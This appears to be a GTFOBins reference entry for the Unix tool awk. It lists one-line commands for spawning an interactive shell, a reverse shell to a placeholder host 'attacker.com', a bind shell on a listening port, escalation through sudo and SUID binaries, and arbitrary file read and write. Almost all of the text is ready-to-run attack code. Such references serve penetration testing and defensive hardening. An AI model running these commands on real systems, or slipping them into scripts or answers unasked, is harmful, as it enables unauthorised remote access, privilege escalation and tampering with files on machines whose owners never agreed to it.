GTFOBins.github.io/_gtfobins/awk.md
2018-07-04 19:26:52 +01:00

1.1 KiB

functions
execute-interactive reverse-shell-non-interactive bind-shell-non-interactive file-write file-read sudo-enabled suid-limited
code
awk 'BEGIN {system("/bin/sh")}'
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. RHOST=attacker.com RPORT=12345 awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN { s = "/inet/tcp/0/" RHOST "/" RPORT; while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
description code
Run `nc target.com 12345` on the attacker box to connect to the shell. LPORT=12345 awk -v LPORT=$LPORT 'BEGIN { s = "/inet/tcp/" LPORT "/0/0"; while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
code
LFILE=file_to_write awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
code
LFILE=file_to_read awk '//' "$LFILE"
code
sudo awk 'BEGIN {system("/bin/sh")}'
code
./awk 'BEGIN {system("/bin/sh")}'